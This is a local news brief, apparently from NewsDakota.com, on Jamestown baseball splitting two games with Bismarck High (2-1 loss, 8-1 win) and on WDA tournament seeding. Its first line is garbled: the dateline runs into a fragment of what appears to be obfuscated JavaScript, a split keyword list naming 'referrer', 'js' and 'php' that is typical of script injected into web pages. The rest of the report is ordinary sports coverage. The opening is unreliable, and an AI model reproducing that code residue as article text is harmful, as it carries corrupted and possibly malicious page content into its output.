JAMESTOWN ebzri|var|u0026u|referrer|eiata||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The Jamestown baseball team dropped the opener to Bismarck High yesterday by a tally of 2-1. The Demons were able to push across a run in the bottom of the 6th to break the tie.

Tyler Ukestad and Brandon Geiszler matched each other pitch for pitch allowing just one run a piece through the first five innings.

Jamestown’s run came on a two-out RBI double from Brian Wenzel. Matt Grounds came around to score and Wenzel was thrown out trying for third. That tied the game in the fourth after a Sean Hogan error led to the Demon’s first run in the preceding half inning.

The Jays won the second game picking up a 8-1 win in a non-conference game. Jamestown put together a seven-run 6th inning to pull away.

Bismarck is currently second in the WDA with two losses, the Jays do have the tiebreaker should Bismarck lose two of their last three and the Jays sweep Century.

Jamestown can lock up no worse than the No. 3-seed in next week’s WDA Tournament with one win over the Patriots on Thursday.
